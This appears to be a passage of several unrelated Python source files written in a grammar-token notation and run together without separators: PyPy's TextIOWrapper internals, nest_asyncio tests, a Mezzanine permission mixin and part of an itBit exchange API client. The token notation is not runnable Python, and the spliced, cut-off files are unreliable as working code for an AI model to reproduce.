space<block_start><if_stmt>self.state<eq>STATE_DETACHED<block_start><raise>oefmt(space.w_ValueError "underlying buffer has been detached")<block_end>self._check_init(space)<block_end><def_stmt>_check_closed self space message=<none><block_start>self._check_init(space)<line_sep>W_TextIOBase._check_closed(self space message)<block_end><def_stmt>descr_repr self space<block_start>self._check_init(space)<line_sep>w_name=space.findattr(self space.newtext("name"))<if_stmt>w_name<is><none><block_start>w_name_str=space.newtext("")<block_end><else_stmt><block_start>w_name_str=space.mod(space.newtext("name=%r ") w_name)<block_end>w_args=space.newtuple([w_name_str self.w_encoding])<line_sep><return>space.mod(space.newtext("<_io.TextIOWrapper %sencoding=%r>") w_args)<block_end><def_stmt>readable_w self space<block_start>self._check_attached(space)<line_sep><return>space.call_method(self.w_buffer "readable")<block_end><def_stmt>writable_w self space<block_start>self._check_attached(space)<line_sep><return>space.call_method(self.w_buffer "writable")<block_end><def_stmt>seekable_w self space<block_start>self._check_attached(space)<line_sep><return>space.call_method(self.w_buffer "seekable")<block_end><def_stmt>isatty_w self space<block_start>self._check_attached(space)<line_sep><return>space.call_method(self.w_buffer "isatty")<block_end><def_stmt>fileno_w self space<block_start>self._check_attached(space)<line_sep><return>space.call_method(self.w_buffer "fileno")<block_end><def_stmt>closed_get_w self space<block_start>self._check_attached(space)<line_sep><return>space.getattr(self.w_buffer space.newtext("closed"))<block_end><def_stmt>newlines_get_w self space<block_start>self._check_attached(space)<if_stmt>self.w_decoder<is><none><block_start><return>space.w_None<block_end><return>space.findattr(self.w_decoder space.newtext("newlines"))<block_end><def_stmt>name_get_w self space<block_start>self._check_attached(space)<line_sep><return>space.getattr(self.w_buffer 
space.newtext("name"))<block_end><def_stmt>flush_w self space<block_start>self._check_attached(space)<line_sep>self._check_closed(space)<line_sep>self.telling=self.seekable<line_sep>self._writeflush(space)<line_sep>space.call_method(self.w_buffer "flush")<block_end>@unwrap_spec(w_pos=WrappedDefault(<none>))<def_stmt>truncate_w self space w_pos=<none><block_start>self._check_attached(space)<line_sep>space.call_method(self "flush")<line_sep><return>space.call_method(self.w_buffer "truncate" w_pos)<block_end><def_stmt>close_w self space<block_start>self._check_attached(space)<if_stmt><not>space.is_true(space.getattr(self.w_buffer space.newtext("closed")))<block_start><try_stmt><block_start>space.call_method(self "flush")<block_end><finally_stmt><block_start>ret=space.call_method(self.w_buffer "close")<block_end><return>ret<block_end><block_end># _____________________________________________________________ # read methods <def_stmt>_read_chunk self space<block_start>"""Read and decode the next chunk of data from the BufferedReader. The return value is True unless EOF was reached. The decoded string is placed in self.decoded (replacing its previous value). The entire input chunk is sent to the decoder, though some of it may remain buffered in the decoder, yet to be converted."""<if_stmt><not>self.w_decoder<block_start><raise>oefmt(space.w_IOError "not readable")<block_end><if_stmt>self.telling# To prepare for tell(), we need to snapshot a point in the file # where the decoder's input buffer is empty. <block_start>w_state=space.call_method(self.w_decoder "getstate")<line_sep># Given this, we know there was a valid snapshot point # len(dec_buffer) bytes ago with decoder state (b'', dec_flags). 
w_dec_buffer,w_dec_flags=space.unpackiterable(w_state 2)<line_sep>dec_buffer=space.bytes_w(w_dec_buffer)<line_sep>dec_flags=space.int_w(w_dec_flags)<block_end><else_stmt><block_start>dec_buffer=<none><line_sep>dec_flags=0<block_end># Read a chunk, decode it, and put the result in self.decoded w_input=space.call_method(self.w_buffer "read1" space.newint(self.chunk_size))<if_stmt><not>space.isinstance_w(w_input space.w_bytes)<block_start>msg="decoder getstate() should have returned a bytes "<concat>"object not '%T'"<line_sep><raise>oefmt(space.w_TypeError msg w_input)<block_end>eof=space.len_w(w_input)<eq>0<line_sep>w_decoded=space.call_method(self.w_decoder "decode" w_input space.newbool(eof))<line_sep>self.decoded.set(space w_decoded)<if_stmt>space.len_w(w_decoded)<g>0<block_start>eof=<false><block_end><if_stmt>self.telling# At the snapshot point, len(dec_buffer) bytes before the read, # the next input to be decoded is dec_buffer + input_chunk. <block_start>next_input=dec_buffer+space.bytes_w(w_input)<line_sep>self.snapshot=PositionSnapshot(dec_flags next_input)<block_end><return><not>eof<block_end><def_stmt>_ensure_data self space<block_start><while_stmt><not>self.decoded.has_data()<block_start><try_stmt><block_start><if_stmt><not>self._read_chunk(space)<block_start>self.decoded.reset()<line_sep>self.snapshot=<none><line_sep><return><false><block_end><block_end><except_stmt>OperationError<as>e<block_start><if_stmt>trap_eintr(space e)<block_start><continue><block_end><raise><block_end><block_end><return><true><block_end><def_stmt>next_w self space<block_start>self._check_attached(space)<line_sep>self.telling=<false><try_stmt><block_start><return>W_TextIOBase.next_w(self space)<block_end><except_stmt>OperationError<as>e<block_start><if_stmt>e.match(space space.w_StopIteration)<block_start>self.telling=self.seekable<block_end><raise><block_end><block_end><def_stmt>read_w self space 
w_size=<none><block_start>self._check_attached(space)<line_sep>self._check_closed(space)<if_stmt><not>self.w_decoder<block_start><raise>oefmt(space.w_IOError "not readable")<block_end>size=convert_size(space w_size)<line_sep>self._writeflush(space)<if_stmt>size<l>0# Read everything <block_start>w_bytes=space.call_method(self.w_buffer "read")<line_sep>w_decoded=space.call_method(self.w_decoder "decode" w_bytes space.w_True)<line_sep>check_decoded(space w_decoded)<line_sep>w_result=space.newunicode(self.decoded.get_chars(-1))<line_sep>w_final=space.add(w_result w_decoded)<line_sep>self.snapshot=<none><line_sep><return>w_final<block_end>remaining=size<line_sep>builder=UnicodeBuilder(size)<line_sep># Keep reading chunks until we have n characters to return <while_stmt>remaining<g>0<block_start><if_stmt><not>self._ensure_data(space)<block_start><break><block_end>data=self.decoded.get_chars(remaining)<line_sep>builder.append(data)<line_sep>remaining<augsub>len(data)<block_end><return>space.newunicode(builder.build())<block_end><def_stmt>_scan_line_ending self limit<block_start><if_stmt>self.readuniversal<block_start><return>self.decoded.find_newline_universal(limit)<block_end><else_stmt><block_start><if_stmt>self.readtranslate# Newlines are already translated, only search for \n <block_start>newline=u'\n'<block_end><else_stmt># Non-universal mode. 
<block_start>newline=self.readnl<block_end><if_stmt>newline<eq>u'\r\n'<block_start><return>self.decoded.find_crlf(limit)<block_end><else_stmt><block_start><return>self.decoded.find_char(newline[0] limit)<block_end><block_end><block_end><def_stmt>readline_w self space w_limit=<none><block_start>self._check_attached(space)<line_sep>self._check_closed(space)<line_sep>self._writeflush(space)<line_sep>limit=convert_size(space w_limit)<line_sep>remnant=<none><line_sep>builder=UnicodeBuilder()<while_stmt><true># First, get some data if necessary <block_start>has_data=self._ensure_data(space)<if_stmt><not>has_data# end of file <block_start><if_stmt>remnant<block_start>builder.append(remnant)<block_end><break><block_end><if_stmt>remnant<block_start><assert_stmt><not>self.readtranslate<and>self.readnl<eq>u'\r\n'<assert_stmt>self.decoded.pos<eq>0<if_stmt>remnant<eq>u'\r'<and>self.decoded.text[0]<eq>u'\n'<block_start>builder.append(u'\r\n')<line_sep>self.decoded.pos=1<line_sep>remnant=<none><line_sep><break><block_end><else_stmt><block_start>builder.append(remnant)<line_sep>remnant=<none><line_sep><continue><block_end><block_end><if_stmt>limit<ge>0<block_start>remaining=limit-builder.getlength()<assert_stmt>remaining<ge>0<block_end><else_stmt><block_start>remaining=-1<block_end>start=self.decoded.pos<assert_stmt>start<ge>0<line_sep>found=self._scan_line_ending(remaining)<line_sep>end_scan=self.decoded.pos<if_stmt>end_scan<g>start<block_start>s=self.decoded.text[start:end_scan]<line_sep>builder.append(s)<block_end><if_stmt>found<or>(limit<ge>0<and>builder.getlength()<ge>limit)<block_start><break><block_end># There may be some remaining chars we'll have to prepend to the # next chunk of data <if_stmt><not>self.decoded.exhausted()<block_start>remnant=self.decoded.get_chars(-1)<block_end># We have consumed the buffer self.decoded.reset()<block_end>result=builder.build()<line_sep><return>space.newunicode(result)<block_end># 
_____________________________________________________________ # write methods <def_stmt>write_w self space w_text<block_start>self._check_attached(space)<line_sep>self._check_closed(space)<if_stmt><not>self.w_encoder<block_start><raise>oefmt(space.w_IOError "not writable")<block_end><if_stmt><not>space.isinstance_w(w_text space.w_unicode)<block_start><raise>oefmt(space.w_TypeError "unicode argument expected, got '%T'" w_text)<block_end>text=space.unicode_w(w_text)<line_sep>textlen=len(text)<line_sep>haslf=<false><if_stmt>(self.writetranslate<and>self.writenl)<or>self.line_buffering<block_start><if_stmt>text.find(u'\n')<ge>0<block_start>haslf=<true><block_end><block_end><if_stmt>haslf<and>self.writetranslate<and>self.writenl<block_start>w_text=space.call_method(w_text "replace" space.newunicode(u'\n') space.newunicode(self.writenl))<line_sep>text=space.unicode_w(w_text)<block_end>needflush=<false><if_stmt>self.line_buffering<and>(haslf<or>text.find(u'\r')<ge>0)<block_start>needflush=<true><block_end># XXX What if we were just reading? 
<if_stmt>self.encodefunc<block_start>w_bytes=self.encodefunc(space w_text self.errors)<line_sep>self.encoding_start_of_stream=<false><block_end><else_stmt><block_start>w_bytes=space.call_method(self.w_encoder "encode" w_text)<block_end>b=space.bytes_w(w_bytes)<if_stmt><not>self.pending_bytes<block_start>self.pending_bytes=[]<line_sep>self.pending_bytes_count=0<block_end>self.pending_bytes.append(b)<line_sep>self.pending_bytes_count<augadd>len(b)<if_stmt>self.pending_bytes_count<g>self.chunk_size<or>needflush<block_start>self._writeflush(space)<block_end><if_stmt>needflush<block_start>space.call_method(self.w_buffer "flush")<block_end>self.snapshot=<none><if_stmt>self.w_decoder<block_start>space.call_method(self.w_decoder "reset")<block_end><return>space.newint(textlen)<block_end><def_stmt>_writeflush self space<block_start><if_stmt><not>self.pending_bytes<block_start><return><block_end>pending_bytes=''.join(self.pending_bytes)<line_sep>self.pending_bytes=<none><line_sep>self.pending_bytes_count=0<while_stmt><true><block_start><try_stmt><block_start>space.call_method(self.w_buffer "write" space.newbytes(pending_bytes))<block_end><except_stmt>OperationError<as>e<block_start><if_stmt>trap_eintr(space e)<block_start><continue><block_end><raise><block_end><else_stmt><block_start><break><block_end><block_end><block_end><def_stmt>detach_w self space<block_start>self._check_attached(space)<line_sep>space.call_method(self "flush")<line_sep>w_buffer=self.w_buffer<line_sep>self.w_buffer=<none><line_sep>self.state=STATE_DETACHED<line_sep><return>w_buffer<block_end># _____________________________________________________________ # seek/tell <def_stmt>_decoder_setstate self space cookie# When seeking to the start of the stream, we call decoder.reset() # rather than decoder.getstate(). # This is for a few decoders such as utf-16 for which the state value # at start is not (b"", 0) but e.g. (b"", 2) (meaning, in the case of # utf-16, that we are expecting a BOM). 
<block_start><if_stmt>cookie.start_pos<eq>0<and>cookie.dec_flags<eq>0<block_start>space.call_method(self.w_decoder "reset")<block_end><else_stmt><block_start>space.call_method(self.w_decoder "setstate" space.newtuple([space.newbytes("") space.newint(cookie.dec_flags)]))<block_end><block_end><def_stmt>_encoder_setstate self space cookie<block_start><if_stmt>cookie.start_pos<eq>0<and>cookie.dec_flags<eq>0<block_start>space.call_method(self.w_encoder "reset")<line_sep>self.encoding_start_of_stream=<true><block_end><else_stmt><block_start>space.call_method(self.w_encoder "setstate" space.newint(0))<line_sep>self.encoding_start_of_stream=<false><block_end><block_end>@unwrap_spec(whence=int)<def_stmt>seek_w self space w_pos whence=0<block_start>self._check_attached(space)<if_stmt><not>self.seekable<block_start><raise>oefmt(space.w_IOError "underlying stream is not seekable")<block_end><if_stmt>whence<eq>1# seek relative to current position <block_start><if_stmt><not>space.eq_w(w_pos space.newint(0))<block_start><raise>oefmt(space.w_IOError "can't do nonzero cur-relative seeks")<block_end># Seeking to the current position should attempt to sync the # underlying buffer with the current position. 
w_pos=space.call_method(self "tell")<block_end><elif_stmt>whence<eq>2# seek relative to end of file <block_start><if_stmt><not>space.eq_w(w_pos space.newint(0))<block_start><raise>oefmt(space.w_IOError "can't do nonzero end-relative seeks")<block_end>space.call_method(self "flush")<line_sep>self.decoded.reset()<line_sep>self.snapshot=<none><if_stmt>self.w_decoder<block_start>space.call_method(self.w_decoder "reset")<block_end><return>space.call_method(self.w_buffer "seek" w_pos space.newint(whence))<block_end><elif_stmt>whence<ne>0<block_start><raise>oefmt(space.w_ValueError "invalid whence (%d, should be 0, 1 or 2)" whence)<block_end><if_stmt>space.is_true(space.lt(w_pos space.newint(0)))<block_start><raise>oefmt(space.w_ValueError "negative seek position %R" w_pos)<block_end>space.call_method(self "flush")<line_sep># The strategy of seek() is to go back to the safe start point and # replay the effect of read(chars_to_skip) from there. cookie=PositionCookie(space.bigint_w(w_pos))<line_sep># Seek back to the safe start point space.call_method(self.w_buffer "seek" space.newint(cookie.start_pos))<line_sep>self.decoded.reset()<line_sep>self.snapshot=<none><line_sep># Restore the decoder to its state from the safe start point. <if_stmt>self.w_decoder<block_start>self._decoder_setstate(space cookie)<block_end><if_stmt>cookie.chars_to_skip# Just like _read_chunk, feed the decoder and save a snapshot. 
<block_start>w_chunk=space.call_method(self.w_buffer "read" space.newint(cookie.bytes_to_feed))<if_stmt><not>space.isinstance_w(w_chunk space.w_bytes)<block_start>msg="underlying read() should have returned "<concat>"a bytes object, not '%T'"<line_sep><raise>oefmt(space.w_TypeError msg w_chunk)<block_end>self.snapshot=PositionSnapshot(cookie.dec_flags space.bytes_w(w_chunk))<line_sep>w_decoded=space.call_method(self.w_decoder "decode" w_chunk space.newbool(bool(cookie.need_eof)))<line_sep>w_decoded=check_decoded(space w_decoded)<line_sep># Skip chars_to_skip of the decoded characters <if_stmt>space.len_w(w_decoded)<l>cookie.chars_to_skip<block_start><raise>oefmt(space.w_IOError "can't restore logical file position")<block_end>self.decoded.set(space w_decoded)<line_sep>self.decoded.pos=cookie.chars_to_skip<block_end><else_stmt><block_start>self.snapshot=PositionSnapshot(cookie.dec_flags "")<block_end># Finally, reset the encoder (merely useful for proper BOM handling) <if_stmt>self.w_encoder<block_start>self._encoder_setstate(space cookie)<block_end><return>w_pos<block_end><def_stmt>tell_w self space<block_start>self._check_closed(space)<if_stmt><not>self.seekable<block_start><raise>oefmt(space.w_IOError "underlying stream is not seekable")<block_end><if_stmt><not>self.telling<block_start><raise>oefmt(space.w_IOError "telling position disabled by next() call")<block_end>self._writeflush(space)<line_sep>space.call_method(self "flush")<line_sep>w_pos=space.call_method(self.w_buffer "tell")<if_stmt>self.w_decoder<is><none><or>self.snapshot<is><none><block_start><assert_stmt><not>self.decoded.text<line_sep><return>w_pos<block_end>cookie=PositionCookie(space.bigint_w(w_pos))<line_sep># Skip backward to the snapshot point (see _read_chunk) cookie.dec_flags=self.snapshot.flags<line_sep>input=self.snapshot.input<line_sep>cookie.start_pos<augsub>len(input)<line_sep># How many decoded characters have been used up since the snapshot? 
<if_stmt><not>self.decoded.pos# We haven't moved from the snapshot point. <block_start><return>space.newlong_from_rbigint(cookie.pack())<block_end>chars_to_skip=self.decoded.pos<line_sep># Starting from the snapshot position, we will walk the decoder # forward until it gives us enough decoded characters. w_saved_state=space.call_method(self.w_decoder "getstate")<try_stmt># Note our initial start point <block_start>self._decoder_setstate(space cookie)<line_sep># Feed the decoder one byte at a time. As we go, note the nearest # "safe start point" before the current location (a point where # the decoder has nothing buffered, so seek() can safely start # from there and advance to this location). chars_decoded=0<line_sep>i=0<while_stmt>i<l>len(input)<block_start>w_decoded=space.call_method(self.w_decoder "decode" space.newbytes(input[i]))<line_sep>check_decoded(space w_decoded)<line_sep>chars_decoded<augadd>space.len_w(w_decoded)<line_sep>cookie.bytes_to_feed<augadd>1<line_sep>w_state=space.call_method(self.w_decoder "getstate")<line_sep>w_dec_buffer,w_flags=space.unpackiterable(w_state 2)<line_sep>dec_buffer_len=space.len_w(w_dec_buffer)<if_stmt>dec_buffer_len<eq>0<and>chars_decoded<le>chars_to_skip# Decoder buffer is empty, so this is a safe start point. <block_start>cookie.start_pos<augadd>cookie.bytes_to_feed<line_sep>chars_to_skip<augsub>chars_decoded<assert_stmt>chars_to_skip<ge>0<line_sep>cookie.dec_flags=space.int_w(w_flags)<line_sep>cookie.bytes_to_feed=0<line_sep>chars_decoded=0<block_end><if_stmt>chars_decoded<ge>chars_to_skip<block_start><break><block_end>i<augadd>1<block_end><else_stmt># We didn't get enough decoded data; signal EOF to get more. 
<block_start>w_decoded=space.call_method(self.w_decoder "decode" space.newbytes("") space.newint(1))<line_sep># final=1 check_decoded(space w_decoded)<line_sep>chars_decoded<augadd>space.len_w(w_decoded)<line_sep>cookie.need_eof=1<if_stmt>chars_decoded<l>chars_to_skip<block_start><raise>oefmt(space.w_IOError "can't reconstruct logical file position")<block_end><block_end><block_end><finally_stmt><block_start>space.call_method(self.w_decoder "setstate" w_saved_state)<block_end># The returned cookie corresponds to the last safe start point. cookie.chars_to_skip=chars_to_skip<line_sep><return>space.newlong_from_rbigint(cookie.pack())<block_end><def_stmt>chunk_size_get_w self space<block_start>self._check_attached(space)<line_sep><return>space.newint(self.chunk_size)<block_end><def_stmt>chunk_size_set_w self space w_size<block_start>self._check_attached(space)<line_sep>size=space.int_w(w_size)<if_stmt>size<le>0<block_start><raise>oefmt(space.w_ValueError "a strictly positive integer is required")<block_end>self.chunk_size=size<block_end><block_end>W_TextIOWrapper.typedef=TypeDef('_io.TextIOWrapper' W_TextIOBase.typedef __new__=generic_new_descr(W_TextIOWrapper) __init__=interp2app(W_TextIOWrapper.descr_init) __repr__=interp2app(W_TextIOWrapper.descr_repr) next=interp2app(W_TextIOWrapper.next_w) read=interp2app(W_TextIOWrapper.read_w) readline=interp2app(W_TextIOWrapper.readline_w) write=interp2app(W_TextIOWrapper.write_w) seek=interp2app(W_TextIOWrapper.seek_w) tell=interp2app(W_TextIOWrapper.tell_w) detach=interp2app(W_TextIOWrapper.detach_w) flush=interp2app(W_TextIOWrapper.flush_w) truncate=interp2app(W_TextIOWrapper.truncate_w) close=interp2app(W_TextIOWrapper.close_w) line_buffering=interp_attrproperty("line_buffering" W_TextIOWrapper wrapfn="newint") readable=interp2app(W_TextIOWrapper.readable_w) writable=interp2app(W_TextIOWrapper.writable_w) seekable=interp2app(W_TextIOWrapper.seekable_w) isatty=interp2app(W_TextIOWrapper.isatty_w) 
fileno=interp2app(W_TextIOWrapper.fileno_w) name=GetSetProperty(W_TextIOWrapper.name_get_w) buffer=interp_attrproperty_w("w_buffer" cls=W_TextIOWrapper) closed=GetSetProperty(W_TextIOWrapper.closed_get_w) errors=interp_attrproperty_w("w_errors" cls=W_TextIOWrapper) newlines=GetSetProperty(W_TextIOWrapper.newlines_get_w) _CHUNK_SIZE=GetSetProperty(W_TextIOWrapper.chunk_size_get_w W_TextIOWrapper.chunk_size_set_w) )<line_sep>
<import_stmt>asyncio<import_stmt>sys<import_stmt>unittest<import_stmt>nest_asyncio<def_stmt>exception_handler loop context<block_start>print('Exception:' context)<block_end><class_stmt>NestTest(unittest.TestCase)<block_start><def_stmt>setUp self<block_start>self.loop=asyncio.new_event_loop()<line_sep>nest_asyncio.apply(self.loop)<line_sep>asyncio.set_event_loop(self.loop)<line_sep>self.loop.set_debug(<true>)<line_sep>self.loop.set_exception_handler(exception_handler)<block_end><def_stmt>tearDown self<block_start>self.assertIsNone(asyncio._get_running_loop())<line_sep>self.loop.close()<del_stmt>self.loop<block_end><async_keyword><def_stmt>coro self<block_start><await>asyncio.sleep(0.01)<line_sep><return>42<block_end><def_stmt>test_nesting self<block_start><async_keyword><def_stmt>f1 <block_start>result=self.loop.run_until_complete(self.coro())<line_sep>self.assertEqual(result <await>self.coro())<line_sep><return>result<block_end><async_keyword><def_stmt>f2 <block_start>result=self.loop.run_until_complete(f1())<line_sep>self.assertEqual(result <await>f1())<line_sep><return>result<block_end>result=self.loop.run_until_complete(f2())<line_sep>self.assertEqual(result 42)<block_end><def_stmt>test_ensure_future_with_run_until_complete self<block_start><async_keyword><def_stmt>f <block_start>task=asyncio.ensure_future(self.coro())<line_sep><return>self.loop.run_until_complete(task)<block_end>result=self.loop.run_until_complete(f())<line_sep>self.assertEqual(result 42)<block_end><def_stmt>test_ensure_future_with_run_until_complete_with_wait self<block_start><async_keyword><def_stmt>f <block_start>task=asyncio.ensure_future(self.coro())<line_sep>done,pending=self.loop.run_until_complete(asyncio.wait([task] return_when=asyncio.ALL_COMPLETED))<line_sep>task=done.pop()<line_sep><return>task.result()<block_end>result=self.loop.run_until_complete(f())<line_sep>self.assertEqual(result 42)<block_end><def_stmt>test_timeout self<block_start><async_keyword><def_stmt>f1 
<block_start><await>asyncio.sleep(0.1)<block_end><async_keyword><def_stmt>f2 <block_start>asyncio.run(asyncio.wait_for(f1() 0.01))<block_end><with_stmt>self.assertRaises(asyncio.TimeoutError)<block_start>self.loop.run_until_complete(f2())<block_end><block_end><def_stmt>test_two_run_until_completes_in_one_outer_loop self<block_start><async_keyword><def_stmt>f1 <block_start>self.loop.run_until_complete(asyncio.sleep(0.02))<line_sep><return>4<block_end><async_keyword><def_stmt>f2 <block_start>self.loop.run_until_complete(asyncio.sleep(0.01))<line_sep><return>2<block_end>result=self.loop.run_until_complete(asyncio.gather(f1() f2()))<line_sep>self.assertEqual(result [4 2])<block_end>@unittest.skipIf(sys.version_info<l>(3 7 0) 'No contextvars module')<def_stmt>test_contextvars self<block_start><import_from_stmt>contextvars ContextVar<line_sep>var=ContextVar('var')<line_sep>var.set(0)<async_keyword><def_stmt>set_val <block_start>var.set(42)<block_end><async_keyword><def_stmt>coro <block_start><await>set_val()<line_sep><await>asyncio.sleep(0.01)<line_sep><return>var.get()<block_end>result=self.loop.run_until_complete(coro())<line_sep>self.assertEqual(result 42)<block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>unittest.main()<block_end>
<import_from_stmt>mezzanine.utils.sites current_site_id has_site_permission<import_from_stmt>widgy.models Content<class_stmt>MultiSitePermissionMixin(object)<block_start><def_stmt>_can_edit_content self request obj<block_start><if_stmt>isinstance(obj Content)<block_start>owners=obj.get_root().node.versiontracker_set.get().owners<line_sep>any_owner_in_current_site=any(current_site_id()<eq>o.site_id<for>o owners)<line_sep><return>has_site_permission(request.user)<and>any_owner_in_current_site<block_end><else_stmt><block_start><return><true><block_end><block_end><def_stmt>has_add_permission self request parent created_obj_cls<block_start><if_stmt><not>self._can_edit_content(request parent)<block_start><return><false><block_end><return>super(MultiSitePermissionMixin self).has_add_permission(request parent created_obj_cls)<block_end><def_stmt>has_change_permission self request obj_or_class<block_start><if_stmt><not>self._can_edit_content(request obj_or_class)<block_start><return><false><block_end><return>super(MultiSitePermissionMixin self).has_change_permission(request obj_or_class)<block_end><def_stmt>has_delete_permission self request obj_or_class<block_start><if_stmt><not>all(self._can_edit_content(request o)<for>o obj_or_class.depth_first_order())<block_start><return><false><block_end><return>super(MultiSitePermissionMixin self).has_delete_permission(request obj_or_class)<block_end><block_end>
""" Exchange documentation: https://api.itbit.com/docs """<line_sep># -*- coding: utf-8 -*- <import_stmt>base64<import_from_stmt>collections OrderedDict defaultdict<import_stmt>hashlib<import_stmt>hmac<import_stmt>json<import_stmt>time<import_stmt>urllib<import_stmt>cdecimal<import_from_stmt>cdecimal Decimal<import_from_stmt>gryphon.lib.exchange exceptions<import_from_stmt>gryphon.lib.exchange order_types<import_from_stmt>gryphon.lib.exchange.exchange_api_wrapper ExchangeAPIWrapper<import_from_stmt>gryphon.lib.logger get_logger<import_from_stmt>gryphon.lib.models.exchange Balance<import_from_stmt>gryphon.lib.money Money<import_from_stmt>gryphon.lib.time_parsing parse<line_sep>logger=get_logger(__name__)<class_stmt>ItbitBTCUSDExchange(ExchangeAPIWrapper)<block_start><def_stmt>__init__ self session=<none> configuration=<none><block_start>super(ItbitBTCUSDExchange self).__init__(session)<line_sep>self.name=u'ITBIT_BTC_USD'<line_sep>self.friendly_name=u'Itbit BTC-USD'<line_sep>self.base_url='https://api.itbit.com/v1'<line_sep>self.currency='USD'<line_sep>self.bid_string='buy'<line_sep>self.ask_string='sell'<line_sep>self.nonce=1<line_sep># Configurables with defaults. self.market_order_fee=Decimal('0.002')<line_sep>self.limit_order_fee=Decimal('0')<line_sep>self.fee=self.market_order_fee<line_sep>self.fiat_balance_tolerance=Money('0.0001' 'USD')<line_sep>self.volume_balance_tolerance=Money('0.00000001' 'BTC')<line_sep>self.max_tick_speed=1<line_sep>self.min_order_size=Money('0' 'BTC')<line_sep>self.use_cached_orderbook=<false><if_stmt>configuration<block_start>self.configure(configuration)<block_end><block_end>@property<def_stmt>wallet_id self<block_start><try_stmt><block_start>self._wallet_id<block_end><except_stmt>AttributeError<block_start>self._wallet_id=self._load_env('ITBIT_BTC_USD_WALLET_ID')<block_end><return>self._wallet_id<block_end><def_stmt>req self req_method url **kwargs# Our auth_request method expects the params in the url. 
<block_start><assert_stmt>'?'<not><in>url<if_stmt>'params'<in>kwargs<block_start><if_stmt>kwargs['params']# Check that it's not empty. <block_start>url<augadd>'?'+urllib.urlencode(kwargs['params'])<block_end><del_stmt>kwargs['params']<block_end>req=super(ItbitBTCUSDExchange self).req(req_method url **kwargs)<line_sep><return>req<block_end><def_stmt>resp self req<block_start>response=super(ItbitBTCUSDExchange self).resp(req)<if_stmt>'error'<in>response<and>response['error']<block_start><raise>exceptions.ExchangeAPIErrorException(self response['error'])<block_end><if_stmt>'code'<in>response<block_start>errors_string=str(response['description'])<line_sep>error_code=int(response['code'])<if_stmt>error_code<eq>81001<block_start><raise>exceptions.InsufficientFundsError()<block_end><elif_stmt>error_code<eq>10002<block_start><raise>exceptions.NonceError()<block_end><elif_stmt>error_code<eq>81002<block_start><raise>exceptions.CancelOrderNotFoundError()<block_end><else_stmt><block_start><raise>exceptions.ExchangeAPIErrorException(self 'Code %s: %s'%(error_code errors_string ))<block_end><block_end><return>response<block_end><def_stmt>all_trades self page=1<block_start>req=self.all_trades_req(page)<line_sep><return>self.all_trades_resp(req)<block_end><def_stmt>all_trades_req self page=1<block_start>params={}<if_stmt>page<block_start>params['page']=page<block_end><return>self.req('get' '/wallets/%s/trades'%self.wallet_id params=params )<block_end><def_stmt>all_trades_resp self req<block_start>response=self.resp(req)<line_sep><return>response['tradingHistory']<block_end><def_stmt>trades_for_orders self order_ids<block_start>req=self.trades_for_orders_req()<line_sep><return>self.trades_for_orders_resp(req order_ids)<block_end><def_stmt>trades_for_orders_req self<block_start><return>self.all_trades_req()<block_end><def_stmt>trades_for_orders_resp self req order_ids<block_start>order_ids=[str(o)<for>o 
order_ids]<line_sep>trades=self.all_trades_resp(req)<line_sep>matching_trades=defaultdict(list)<for_stmt>trade trades<block_start>oid=str(trade['orderId'])<if_stmt>oid<in>order_ids<block_start>matching_trades[oid].append(trade)<block_end><block_end><return>matching_trades<block_end><def_stmt>all_orders self status=<none> page=1<block_start>req=self.all_orders_req(status page)<line_sep><return>self.all_orders_resp(req)<block_end><def_stmt>all_orders_req self status=<none> page=1<block_start>params={}<if_stmt>status<block_start>params['status']=status<block_end><if_stmt>page<block_start>params['page']=page<block_end><return>self.req('get' '/wallets/%s/orders'%self.wallet_id params=params )<block_end><def_stmt>all_orders_resp self req<block_start>raw_orders=self.resp(req)<line_sep>orders=[]<for_stmt>raw_order raw_orders<block_start>mode=self._order_mode_to_const(raw_order['side'])<line_sep>volume=Money(raw_order['amount'] 'BTC')<line_sep>volume_filled=Money(raw_order['amountFilled'] 'BTC')<line_sep>volume_remaining=volume-volume_filled<line_sep>order={'mode':mode 'id':str(raw_order['id']) 'price':Money(raw_order['price'] 'USD') 'volume':volume 'volume_remaining':volume_remaining 'status':raw_order['status']}<line_sep>orders.append(order)<block_end><return>orders<block_end># Common Exchange Methods <def_stmt>auth_request self req_method url request_args<block_start>""" This modifies request_args. 
"""<try_stmt><block_start>self.api_key<line_sep>self.secret<block_end><except_stmt>AttributeError<block_start>self.api_key=self._load_env('ITBIT_BTC_USD_API_KEY')<line_sep>self.secret=self._load_env('ITBIT_BTC_USD_API_SECRET').encode('utf-8')<block_end>timestamp=int(round(time.time()<times>1000))<line_sep>nonce=self.nonce<line_sep>body=''<if_stmt>'data'<in>request_args<block_start>body=json.dumps(request_args['data'])<block_end>request_args['data']=body<line_sep>message=self._auth_create_message(req_method url body nonce timestamp)<line_sep>sig=self._auth_sign_message(message nonce url self.secret)<if_stmt>'headers'<not><in>request_args<block_start>request_args['headers']={}<block_end>headers=request_args['headers']<line_sep>headers['Authorization']=self.api_key+':'+sig<line_sep>headers['X-Auth-Timestamp']=str(timestamp)<line_sep>headers['X-Auth-Nonce']=str(nonce)<line_sep>headers['Content-Type']='application/json'<block_end><def_stmt>_auth_create_message self verb url body nonce timestamp<block_start><return>json.dumps([verb.upper() url body str(nonce) str(timestamp)] separators=(',' ':') )<block_end><def_stmt>_auth_sign_message self message nonce url api_secret<block_start>sha256_hash=hashlib.sha256()<line_sep>nonced_message=str(nonce)+message<line_sep>sha256_hash.update(nonced_message)<line_sep>hash_digest=sha256_hash.digest()<line_sep>msg_to_hmac=url.encode('utf8')+hash_digest<line_sep>hmac_digest=hmac.new(api_secret msg_to_hmac hashlib.sha512).digest()<line_sep>sig=base64.b64encode(hmac_digest)<line_sep><return>sig<block_end><def_stmt>get_balance_req self<block_start><try_stmt><block_start>self.user_id<block_end><except_stmt>AttributeError<block_start>self.user_id=self._load_env('ITBIT_BTC_USD_USER_ID')<block_end><return>self.req('get' '/wallets/%s'%self.wallet_id)<block_end><def_stmt>get_balance_resp self 
